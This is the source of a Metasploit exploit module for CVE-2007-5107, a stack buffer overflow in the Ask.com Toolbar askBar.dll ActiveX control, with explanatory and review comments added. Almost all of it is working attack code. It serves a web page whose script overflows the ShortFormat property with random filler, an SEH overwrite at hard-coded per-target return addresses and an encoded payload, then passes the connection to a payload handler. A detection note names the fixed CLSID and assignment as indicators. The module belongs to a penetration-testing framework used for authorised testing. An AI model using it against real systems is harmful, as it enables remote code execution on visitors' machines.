GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/ask_shortformat.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser-side exploit module for CVE-2007-5107 (see 'References'): the
# Ask.com Toolbar askBar.dll ActiveX control's ShortFormat property.
# The HttpServer::HTML mixin delivers the page built in on_request_uri to
# any client that requests the module's URI; the Seh mixin supplies
# generate_seh_payload, which produces the SEH record used in that buffer.
#
# Detection note: the served page always contains the literal CLSID
# 5A074B2B-F830-49DE-A31B-5BB9D7F6B407 and a `.ShortFormat =` assignment
# of one very long string. Only the identifier names and the filler bytes
# are randomized per request, so those two literals are stable indicators
# for content inspection.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::Seh

  # Registers the module metadata (name, references, payload constraints,
  # per-OS targets) with the framework.
  #
  # @param info [Hash] base info hash merged by update_info (default: {})
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53.
          An attacker may be able to execute arbitrary code by sending an overly
          long string to the "ShortFormat()" method in askbar.dll.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'MC' ],
        'References' => [
          [ 'CVE', '2007-5107' ],
          [ 'OSVDB', '37735' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Payload' => {
          'Space' => 800,
          # Bytes the encoded payload must avoid. The single quote and the
          # backslash are excluded because the buffer is embedded in a
          # single-quoted JavaScript string literal in on_request_uri.
          'BadChars' => "\x00\x09\x0a\x0d'\\",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        # Per-target layout used by on_request_uri: 'Offset' is the length of
        # the alphabetic filler placed before the SEH record, and 'Ret' is the
        # address handed to generate_seh_payload (exposed as target.ret).
        'Targets' => [
          [ 'Windows XP SP0/SP1 Pro English', { 'Offset' => 2876, 'Ret' => 0x71aa32ad } ],
          [ 'Windows 2000 Pro English ALL', { 'Offset' => 1716, 'Ret' => 0x75022ac4 } ],
        ],
        'DisclosureDate' => '2007-09-24',
        'DefaultTarget' => 0,
        # Reliability, stability and side effects have not been assessed.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Always returns false, which opts this module out of the framework's
  # automatic exploit selection.
  # NOTE(review): the exact consumers of autofilter live in Msf::Exploit,
  # outside this file — confirm there before relying on this description.
  def autofilter
    false
  end

  # Declares the module's dependency on zlib via the mixin-provided use_zlib.
  # NOTE(review): presumably needed for compressed HTTP responses — verify
  # in Msf::Exploit::Remote::HttpServer.
  def check_dependencies
    use_zlib
  end

  # Handles one HTTP request from a connected client: builds the overflow
  # buffer for the selected target, embeds it in a page that instantiates
  # the ActiveX control and assigns the buffer to its ShortFormat property,
  # sends that page, then hands the connection to the payload handler.
  #
  # @param cli [Object] client connection supplied by the HTTP server mixin
  # @param request [Object] the incoming request; not inspected here
  # @return [nil] early when the payload cannot be regenerated for this client
  def on_request_uri(cli, request)
    # Re-generate the payload
    # NOTE(review): `p` is assigned but never read below; the call is kept
    # presumably for its side effect of refreshing the per-client encoded
    # payload — verify against regenerate_payload in the framework.
    return if ((p = regenerate_payload(cli)) == nil)

    # Randomize some things
    # Both identifiers are 1..100 random alphabetic characters, so the
    # object id and the JavaScript variable name differ per request.
    vname = rand_text_alpha(rand(100) + 1)
    strname = rand_text_alpha(rand(100) + 1)

    # Set the exploit buffer
    # Layout: target-specific filler, the SEH record built for target.ret,
    # then alphabetic padding equal to the encoded payload's length. Note
    # that payload.encoded is not appended here directly; presumably
    # generate_seh_payload already embeds it — verify in the Seh mixin.
    filler = rand_text_alpha(target['Offset'])
    seh = generate_seh_payload(target.ret)
    sploit = filler + seh + rand_text_alpha(payload.encoded.length)

    # Build out the message
    # The HTML below is intentionally at column 0: it is the literal body
    # of the %Q string and every leading space would be sent to the client.
    content = %Q|<html>
<object classid='clsid:5A074B2B-F830-49DE-A31B-5BB9D7F6B407' id='#{vname}'></object>
<script language='javascript'>
#{strname} = new String('#{sploit}');
#{vname}.ShortFormat = #{strname}
</script>
</html>
|

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    # Must stay after send_response_html so the page has been written
    # before the connection is passed to the handler.
    handler(cli)
  end
end